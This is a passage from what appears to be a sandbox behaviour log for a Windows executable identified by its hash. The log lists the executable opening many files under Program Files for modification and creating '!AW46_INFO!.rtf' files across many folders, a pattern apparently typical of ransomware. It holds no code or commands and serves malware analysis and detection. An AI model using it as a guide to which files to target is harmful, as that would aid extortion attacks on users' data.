Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\RenameConvertTo.kix 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\FormatBackup.wm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\MeasureAdd.jpeg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\CopyClear.rmi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Merida 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties 